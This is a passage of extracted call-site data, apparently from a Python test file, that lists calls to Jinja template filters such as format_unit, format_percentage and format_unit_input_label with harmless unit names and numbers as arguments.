{}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((400, 29, 400, 40), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((444, 25, 444, 49), 'app.jinja_filters.format_percentage', 'format_percentage', ({(444, 43, 444, 48): '"""100"""'}, {}), "('100')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((445, 25, 445, 47), 'app.jinja_filters.format_percentage', 'format_percentage', ({(445, 43, 445, 46): '(100)'}, {}), '(100)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((446, 25, 446, 47), 'app.jinja_filters.format_percentage', 'format_percentage', ({(446, 43, 446, 46): '(4.5)'}, {}), '(4.5)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((449, 25, 449, 62), 'app.jinja_filters.format_number_to_alphabetic_letter', 'format_number_to_alphabetic_letter', ({(449, 60, 449, 61): '(0)'}, {}), '(0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((450, 25, 450, 62), 'app.jinja_filters.format_number_to_alphabetic_letter', 'format_number_to_alphabetic_letter', ({(450, 60, 450, 61): '(4)'}, {}), '(4)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((451, 25, 451, 63), 'app.jinja_filters.format_number_to_alphabetic_letter', 'format_number_to_alphabetic_letter', ({(451, 60, 451, 62): '(25)'}, {}), '(25)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((452, 25, 452, 63), 'app.jinja_filters.format_number_to_alphabetic_letter', 'format_number_to_alphabetic_letter', ({(452, 60, 452, 62): '(-1)'}, {}), '(-1)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((456, 25, 456, 57), 'app.jinja_filters.format_unit', 'format_unit', ({(456, 37, 456, 51): '"""length-meter"""', (456, 53, 456, 56): '(100)'}, {}), "('length-meter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((457, 25, 457, 62), 'app.jinja_filters.format_unit', 'format_unit', ({(457, 37, 457, 56): '"""length-centimeter"""', (457, 58, 457, 61): '(100)'}, {}), "('length-centimeter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((458, 25, 458, 56), 'app.jinja_filters.format_unit', 'format_unit', ({(458, 37, 458, 50): '"""length-mile"""', (458, 52, 458, 55): '(100)'}, {}), "('length-mile', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((459, 25, 459, 61), 'app.jinja_filters.format_unit', 'format_unit', ({(459, 37, 459, 55): '"""length-kilometer"""', (459, 57, 459, 60): '(100)'}, {}), "('length-kilometer', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((460, 25, 460, 62), 'app.jinja_filters.format_unit', 'format_unit', ({(460, 37, 460, 56): '"""area-square-meter"""', (460, 58, 460, 61): '(100)'}, {}), "('area-square-meter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((461, 25, 461, 67), 'app.jinja_filters.format_unit', 'format_unit', ({(461, 37, 461, 61): '"""area-square-centimeter"""', (461, 63, 461, 66): '(100)'}, {}), "('area-square-centimeter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((462, 25, 462, 66), 'app.jinja_filters.format_unit', 'format_unit', ({(462, 37, 462, 60): '"""area-square-kilometer"""', (462, 62, 462, 65): '(100)'}, {}), "('area-square-kilometer', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((463, 25, 463, 61), 'app.jinja_filters.format_unit', 'format_unit', ({(463, 37, 463, 55): '"""area-square-mile"""', (463, 57, 463, 60): '(100)'}, {}), "('area-square-mile', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((464, 25, 464, 57), 'app.jinja_filters.format_unit', 'format_unit', ({(464, 37, 464, 51): '"""area-hectare"""', (464, 53, 464, 56): '(100)'}, {}), "('area-hectare', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((465, 25, 465, 54), 'app.jinja_filters.format_unit', 'format_unit', ({(465, 37, 465, 48): '"""area-acre"""', (465, 50, 465, 53): '(100)'}, {}), "('area-acre', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((466, 25, 466, 63), 'app.jinja_filters.format_unit', 'format_unit', ({(466, 37, 466, 57): '"""volume-cubic-meter"""', (466, 59, 466, 62): '(100)'}, {}), "('volume-cubic-meter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((467, 25, 467, 68), 'app.jinja_filters.format_unit', 'format_unit', ({(467, 37, 467, 62): '"""volume-cubic-centimeter"""', (467, 64, 467, 67): '(100)'}, {}), "('volume-cubic-centimeter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((468, 25, 468, 57), 'app.jinja_filters.format_unit', 'format_unit', ({(468, 37, 468, 51): '"""volume-liter"""', (468, 53, 468, 56): '(100)'}, {}), "('volume-liter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((469, 25, 469, 62), 'app.jinja_filters.format_unit', 'format_unit', ({(469, 37, 469, 56): '"""volume-hectoliter"""', (469, 58, 469, 61): '(100)'}, {}), "('volume-hectoliter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((470, 25, 470, 61), 'app.jinja_filters.format_unit', 'format_unit', ({(470, 37, 470, 55): '"""volume-megaliter"""', (470, 57, 470, 60): '(100)'}, {}), "('volume-megaliter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((471, 25, 471, 58), 'app.jinja_filters.format_unit', 'format_unit', ({(471, 37, 471, 52): '"""duration-hour"""', (471, 54, 471, 57): '(100)'}, {}), "('duration-hour', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((472, 25, 472, 66), 'app.jinja_filters.format_unit', 'format_unit', ({(472, 37, 472, 52): '"""duration-hour"""', (472, 54, 472, 57): '(100)', (472, 59, 472, 65): '"""long"""'}, {}), "('duration-hour', 100, 'long')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((473, 25, 473, 66), 'app.jinja_filters.format_unit', 'format_unit', ({(473, 37, 473, 52): '"""duration-year"""', (473, 54, 473, 57): '(100)', (473, 59, 473, 65): '"""long"""'}, {}), "('duration-year', 100, 'long')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((477, 25, 477, 58), 'app.jinja_filters.format_unit', 'format_unit', ({(477, 37, 477, 52): '"""duration-hour"""', (477, 54, 477, 57): '(100)'}, {}), "('duration-hour', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((478, 25, 478, 58), 'app.jinja_filters.format_unit', 'format_unit', ({(478, 37, 478, 52): '"""duration-year"""', (478, 54, 478, 57): '(100)'}, {}), "('duration-year', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((479, 25, 479, 66), 'app.jinja_filters.format_unit', 'format_unit', ({(479, 37, 479, 52): '"""duration-hour"""', (479, 54, 479, 57): '(100)', (479, 59, 479, 65): '"""long"""'}, {}), "('duration-hour', 100, 'long')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((480, 25, 480, 66), 'app.jinja_filters.format_unit', 'format_unit', ({(480, 37, 480, 52): '"""duration-year"""', (480, 54, 480, 57): '(100)', (480, 59, 480, 65): '"""long"""'}, {}), "('duration-year', 100, 'long')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((484, 25, 484, 64), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(484, 49, 484, 63): '"""length-meter"""'}, {}), "('length-meter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((485, 25, 485, 69), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(485, 49, 485, 68): '"""length-centimeter"""'}, {}), "('length-centimeter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((486, 25, 486, 63), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(486, 49, 486, 62): '"""length-mile"""'}, {}), "('length-mile')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((487, 25, 487, 68), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(487, 49, 487, 67): '"""length-kilometer"""'}, {}), "('length-kilometer')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((488, 25, 488, 69), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(488, 49, 488, 68): '"""area-square-meter"""'}, {}), "('area-square-meter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((489, 25, 489, 74), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(489, 49, 489, 73): '"""area-square-centimeter"""'}, {}), "('area-square-centimeter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((490, 25, 490, 73), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(490, 49, 490, 72): '"""area-square-kilometer"""'}, {}), "('area-square-kilometer')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((491, 25, 491, 68), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(491, 49, 491, 67): '"""area-square-mile"""'}, {}), "('area-square-mile')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((492, 25, 492, 64), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(492, 49, 492, 63): '"""area-hectare"""'}, {}), "('area-hectare')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((493, 25, 493, 61), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(493, 49, 493, 60): '"""area-acre"""'}, {}), "('area-acre')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((494, 25, 494, 70), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(494, 49, 494, 69): '"""volume-cubic-meter"""'}, {}), "('volume-cubic-meter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((495, 25, 495, 75), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(495, 49, 495, 74): '"""volume-cubic-centimeter"""'}, {}), "('volume-cubic-centimeter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((496, 25, 496, 64), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(496, 49, 496, 63): '"""volume-liter"""'}, {}), "('volume-liter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((497, 25, 497, 69), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(497, 49, 497, 68): '"""volume-hectoliter"""'}, {}), "('volume-hectoliter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((498, 25, 498, 